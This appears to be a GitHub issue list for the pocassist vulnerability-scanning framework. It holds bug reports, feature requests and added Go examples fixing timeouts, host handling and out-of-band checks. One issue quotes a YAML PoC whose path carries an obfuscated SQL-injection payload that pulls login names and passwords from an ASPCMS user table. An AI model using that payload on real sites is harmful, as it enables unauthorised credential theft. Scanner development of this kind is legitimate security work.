jweny / pocassist
A dead-simple vulnerability PoC testing framework
Home Page: https://pocassist.jweny.top/
License: Apache License 2.0
Is this semi-open-source?
Since this is a vulnerability testing framework, could it also be offered as a Go package for users, i.e., expose just the vulnerability-testing part as a separate interface that users can import into their own Go programs? That would be more convenient and would help the PoC library ecosystem stay up to date.
Line 82 in 169c0d0
Hello, I am testing the sonar-cve-2020-27896 vulnerability.
Without a proxy configured, the response is garbled and the scanner judges "vulnerability not present"; with a proxy configured, the response data is normal and the scanner judges "vulnerability present". Does this mean there may be a situation where "configuring a proxy affects the scan result"?
PS: When accessing the target directly in a browser, the response data is normal, and sonar is indeed vulnerable.
Suggest adding batch import and export of POCs, to make it easier to supplement POC files.
For application/x-www-form-urlencoded POST data containing line breaks, strings.Replace(postdata, "\n", "\r\n", -1) is needed; otherwise the request is sent incomplete.
The values passed to rate.NewLimiter() are wrong: the first argument should be MaxQps, the second the instantaneous concurrency (burst) value.
The published version is Release 1.0.5, but after actually downloading pocassist_darwin_amd64.zip, extracting and running it, the reported version is 1.0.4. Was it forgotten to update?
How to support script scanning?
1. Create a task
2. Select multiple custom rules, choosing several weblogic-related PoCs
3. Import a URL list file with a few hundred test URLs
4. Start the task
After starting the task this way, all tasks get stuck in the running state, but the traffic monitor shows no inbound or outbound traffic.
Is the failure to detect vulnerabilities because the exe version doesn't work, and I have to set up a Go server myself?
Suggest adding a batch delete operation.
Suggest adding batch import of xray rules.
If possible, suggest adding nuclei rule support.
After importing a yaml rule it reports "upload succeeded", but the rule is not actually written to the database. For example:
poc-yaml-aspcms-id-sqli.yml
name: poc-yaml-aspcms-id-sqli
manual: true
transport: http
rules:
  r0:
    request:
      method: GET
      path: /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes((string("line1")))) && response.body.bcontains(bytes((string("line2"))))
expression: r0()
detail:
  author: xiao1hu
  links:
    - https://www.yuque.com/peiqiwiki/peiqi-poc-wiki/bg59x4
  Affected Version: ASPCMS
Optimization suggestion
Suggest improving file loading speed. I tested many times: at roughly 500+ URLs or 1000+ IPs, importing the txt file freezes everything and the server's 16 GB of memory fills up completely. It is not exactly a hang, more that the page stops responding. But after the import finishes, the cmd window running the main program keeps throwing errors and never scans.
In reverse.go, the GetReverseResp function does not account for ceye returning a 503 status, so it returns true on a 503, which very easily produces false positives, especially during batch scanning.
Line 32 in 169c0d0
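The failure mode described in the issue above (an out-of-band platform returning 503 being counted as a callback hit) is worth showing in working code. The following is an added example written for this page, not pocassist's own reverse.go: the reverse platform, its JSON record format (a `data` array of `{name}` objects), the `?filter=` query parameter and the hostnames are all constructed for the demo and do not match ceye's real API. The point is the contract of `CheckReverse`: a hit is reported only on HTTP 200 with a body that actually lists the token; any other status, transport error or undecodable body comes back as `ErrReverseUnavailable` so batch scans record "unknown" rather than "vulnerable".

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// ErrReverseUnavailable marks a query the reverse (OOB) platform could not
// answer, e.g. a 503. Callers must treat it as "unknown", never as a hit.
var ErrReverseUnavailable = errors.New("reverse platform unavailable")

// reverseRecord / reverseResponse are an assumed JSON shape for the platform's
// record query (constructed for this example; not ceye's real API format).
type reverseRecord struct {
	Name string `json:"name"`
}

type reverseResponse struct {
	Data []reverseRecord `json:"data"`
}

// CheckReverse asks endpoint for records matching token. It reports a hit only
// when the platform answers 200 with a body that actually lists the token; any
// non-200 status, transport error or bad JSON is surfaced as an error so a
// platform outage cannot turn into a "vulnerable" result.
func CheckReverse(client *http.Client, endpoint, token string) (bool, error) {
	resp, err := client.Get(endpoint + "?filter=" + token)
	if err != nil {
		return false, fmt.Errorf("%w: %v", ErrReverseUnavailable, err)
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return false, fmt.Errorf("%w: HTTP %d", ErrReverseUnavailable, resp.StatusCode)
	}
	var parsed reverseResponse
	if err := json.NewDecoder(resp.Body).Decode(&parsed); err != nil {
		return false, fmt.Errorf("%w: bad JSON: %v", ErrReverseUnavailable, err)
	}
	for _, rec := range parsed.Data {
		if strings.Contains(rec.Name, token) {
			return true, nil
		}
	}
	return false, nil
}

// NewFakePlatform is a constructed stand-in for the reverse platform: it
// answers every query with the given status and, on 200, the given records.
func NewFakePlatform(status int, names []string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(status)
		if status != http.StatusOK {
			fmt.Fprint(w, "Service Unavailable")
			return
		}
		var body reverseResponse
		for _, n := range names {
			body.Data = append(body.Data, reverseRecord{Name: n})
		}
		json.NewEncoder(w).Encode(body)
	}))
}

func main() {
	cases := []struct {
		status int
		names  []string
	}{
		{http.StatusServiceUnavailable, nil},                 // outage: unknown, not a hit
		{http.StatusOK, []string{"other.dns.example"}},       // no callback for our token
		{http.StatusOK, []string{"abc123.dns.example"}},      // genuine callback
	}
	for _, c := range cases {
		srv := NewFakePlatform(c.status, c.names)
		hit, err := CheckReverse(srv.Client(), srv.URL, "abc123")
		srv.Close()
		fmt.Printf("status=%d hit=%v err=%v\n", c.status, hit, err)
	}
}
```

The caller decides what to do with `ErrReverseUnavailable`: retry the query later, or mark the task result as inconclusive. What it must not do is collapse the error into a boolean.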
Problem deploying on Linux, error: cannot execute binary file. Logged in as root, file chmod 777, deployed the Linux64 package, machine environment CentOS 7.4, database set up with BaoTa panel. Currently unable to troubleshoot; hoping for some advice. Deploying locally on Windows works fine.
admin/admin2 doesn't work on this latest version.
db.Setup err: pocassist.db not exist, download at https://github.com/jweny/pocassistdb/releases
Hello master, I'd like to ask whether the script defect has been fixed, or whether you have any ideas to share?
Bro, I couldn't find the username and password in the config file.
Suggest adding batch deletion of tasks and scan results:
1. Batch delete results where no vulnerability was found
2. Support batch export of results where a vulnerability was found
Found a problem: running a single POC finds the vulnerability, but when running all POCs, the POC that can find it shows:
{"level":"error","time":"2022-04-20 14:56:28.136","linenum":"/root/croto/poc/rule/controller.go:173","msg":",POC: poc-yaml-Disclosure_dsStore [rule/controller.go: DoSingleRuleRequest error] dialing to the given TCP address timed out"}
My guess is:
// Warning: DoTimeout does not terminate the request itself. The request will
// continue in the background and the response will be discarded.
// If requests take too long and the connection pool gets filled up please
// try using a Client and setting a ReadTimeout.
But even after setting ReadTimeout, the problem still occurs.
I can't figure it out???
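The quoted fasthttp warning describes exactly how a full-POC run can exhaust a connection pool: a timeout that only stops waiting, without cancelling the request, leaves every slow target holding a connection. The following is an added example written for this page, not pocassist's code: it uses the standard library's net/http, where cancelling the request context tears down the in-flight call, and bounds concurrency with a semaphore. The slow/fast targets, the `/slow` path convention and the 200 ms deadline are constructed for the demo.

```go
package main

import (
	"context"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
	"time"
)

// ScanResult records the outcome of one probe.
type ScanResult struct {
	Target string
	Status int
	Err    error
}

// ScanTargets probes every target with at most `workers` requests in flight and
// a hard per-request deadline. Cancelling the request context aborts the
// transport call itself, so a target that never answers releases both its
// connection and its worker slot instead of pinning them for the whole run.
func ScanTargets(client *http.Client, targets []string, workers int, perReq time.Duration) []ScanResult {
	results := make([]ScanResult, len(targets))
	sem := make(chan struct{}, workers) // bounded concurrency
	var wg sync.WaitGroup
	for i, target := range targets {
		wg.Add(1)
		sem <- struct{}{}
		go func(i int, target string) {
			defer wg.Done()
			defer func() { <-sem }()
			ctx, cancel := context.WithTimeout(context.Background(), perReq)
			defer cancel()
			req, err := http.NewRequestWithContext(ctx, http.MethodGet, target, nil)
			if err != nil {
				results[i] = ScanResult{Target: target, Err: err}
				return
			}
			resp, err := client.Do(req)
			if err != nil {
				// Includes context.DeadlineExceeded: the connection is already torn down.
				results[i] = ScanResult{Target: target, Err: err}
				return
			}
			resp.Body.Close()
			results[i] = ScanResult{Target: target, Status: resp.StatusCode}
		}(i, target)
	}
	wg.Wait()
	return results
}

// NewSlowServer is a constructed stand-in for scan targets: paths under /slow
// hang for `delay` (or until the client gives up); anything else answers 200.
func NewSlowServer(delay time.Duration) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if strings.HasPrefix(r.URL.Path, "/slow") {
			select {
			case <-time.After(delay):
			case <-r.Context().Done(): // client cancelled: stop holding the handler
				return
			}
		}
		w.WriteHeader(http.StatusOK)
	}))
}

func main() {
	srv := NewSlowServer(5 * time.Second)
	defer srv.Close()
	targets := []string{srv.URL + "/slow/1", srv.URL + "/ok/1", srv.URL + "/slow/2", srv.URL + "/ok/2"}
	start := time.Now()
	for _, r := range ScanTargets(srv.Client(), targets, 2, 200*time.Millisecond) {
		fmt.Printf("%-40s status=%d err=%v\n", r.Target, r.Status, r.Err)
	}
	// Two 5 s targets with two workers finish in well under a second.
	fmt.Println("elapsed:", time.Since(start).Round(time.Millisecond))
}
```

Two knobs matter when porting this idea to any HTTP client: the deadline has to cancel the underlying call (a context here; in fasthttp the post's quoted comment says DoTimeout does not), and concurrency has to be bounded independently of the connection pool so that timed-out targets cannot starve the rest of the run.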
Cannot log in to the pocassist demo UI with the U/P admin/admin2 given in the official docs.
1. Suggest supporting nuclei templates: vulnerabilities are updated quickly, the quality is quite high, and they are also in yaml form.
There is a problem with the DoSingleRuleRequest function in controller.go: after fixedFastReq.URI().Update(curPath) executes, the host header seems to be dropped. In my testing it was always dropped and then errored with "no such host"; I had to manually call fixedFastReq.URI().SetHost(curHost). I don't know why most of your program sends requests fine and only a small portion of POCs error out.
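The failure the issue above describes (a rule's path being applied to the target URL and the host getting lost on the way) is easiest to reason about with a small, self-contained resolver. The following is an added example written for this page using net/url, not the project's fasthttp-based DoSingleRuleRequest; `ApplyPocPath` and the sample target URLs are assumptions made for the demo. It keeps scheme, host and port from the target, fails loudly when the target has no host (instead of producing a request that dials nothing), and, as a check a scanner should also have, rejects rule paths such as `//evil.example/x` that would carry their own authority and redirect the probe off the target.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// ErrNoHost is returned when the target URL carries nothing to dial.
var ErrNoHost = errors.New("target URL has no host")

// ApplyPocPath builds the request URL for one rule: it swaps the target's path
// and query for pocPath while keeping scheme, host and port from the target.
// A pocPath starting with "/" replaces the whole path; one without a leading
// slash is resolved relative to the target's directory, as a browser would.
func ApplyPocPath(target, pocPath string) (string, error) {
	base, err := url.Parse(target)
	if err != nil {
		return "", fmt.Errorf("bad target %q: %w", target, err)
	}
	if base.Scheme == "" || base.Host == "" {
		// Without a host the client has nothing to dial ("no such host");
		// fail here instead of sending a malformed request.
		return "", fmt.Errorf("%w: %q", ErrNoHost, target)
	}
	ref, err := url.Parse(pocPath)
	if err != nil {
		return "", fmt.Errorf("bad poc path %q: %w", pocPath, err)
	}
	// A rule path must never carry its own scheme or authority:
	// "//evil.example/x" would otherwise redirect the probe off the target.
	if ref.Scheme != "" || ref.Host != "" || ref.User != nil {
		return "", fmt.Errorf("poc path %q is not host-relative", pocPath)
	}
	full := base.ResolveReference(ref)
	if full.Host != base.Host {
		return "", fmt.Errorf("host changed from %q to %q", base.Host, full.Host)
	}
	return full.String(), nil
}

func main() {
	// Constructed sample targets and rule paths.
	cases := [][2]string{
		{"http://10.0.0.5:8080/app/", "/plug/comment/commentList.asp?id=1"},
		{"https://example.com/app/index.php", "admin/login.php"},
		{"http://10.0.0.5:8080/", "//evil.example/steal"},
		{"/just/a/path", "/x"},
	}
	for _, c := range cases {
		got, err := ApplyPocPath(c[0], c[1])
		fmt.Printf("%-36s + %-36s => %s (err=%v)\n", c[0], c[1], got, err)
	}
}
```

Whatever HTTP library is used, the property to assert after a path update is the one `ApplyPocPath` checks last: the host of the outgoing request equals the host of the scanned target.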
After batch scanning, the discovered vulnerabilities are not easy to find; suggest adding a save-results feature.
response.body.bcontains(b'admin') == means the response contains admin; how do I write "does not contain admin"?
Newbie asking for guidance.
Seeing Release 1.0.5, looking forward to the update~~
Site login username/password? It's not admin/admin2.
With a proxy set, scanning ip+port, the target cannot be reached.
Can't find it online either.
Error message:
2021/10/06 18:33:10 [Recovery] 2021/10/06 - 18:33:10 panic recovered:
runtime error: invalid memory address or nil pointer dereference
/usr/local/go/src/runtime/panic.go:221 (0x4516c6)
panicmem: panic(memoryError)
/usr/local/go/src/runtime/signal_unix.go:735 (0x451696)
sigpanic: panicmem()
/home/myh0st/tools/pocassist/api/routers/v1/scan/scan/scan.go:206 (0xc48573)
List: c.JSON(msg.ErrResp("插件加载失败" + err.Error()))
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x9f175e)
(*Context).Next: c.handlersc.index
/home/myh0st/tools/pocassist/api/middleware/jwt/jwt.go:47 (0x9f15d3)
JWT.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b4981)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/recovery.go:99 (0x8b496c)
CustomRecoveryWithWriter.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b3be6)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/logger.go:241 (0x8b3bc9)
LoggerWithConfig.func1: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:165 (0x8b311d)
(*Context).Next: c.handlersc.index
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:489 (0x8b2da5)
(*Engine).handleHTTPRequest: c.Next()
/root/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:445 (0x8b2904)
(*Engine).ServeHTTP: engine.handleHTTPRequest(c)
/usr/local/go/src/net/http/server.go:2878 (0x6a255a)
serverHandler.ServeHTTP: handler.ServeHTTP(rw, req)
/usr/local/go/src/net/http/server.go:1929 (0x69dc07)
(*conn).serve: serverHandler{c.server}.ServeHTTP(w, w.req)
/usr/local/go/src/runtime/asm_amd64.s:1581 (0x46c0c0)
goexit: BYTE $0x90 // NOP
how how how? plz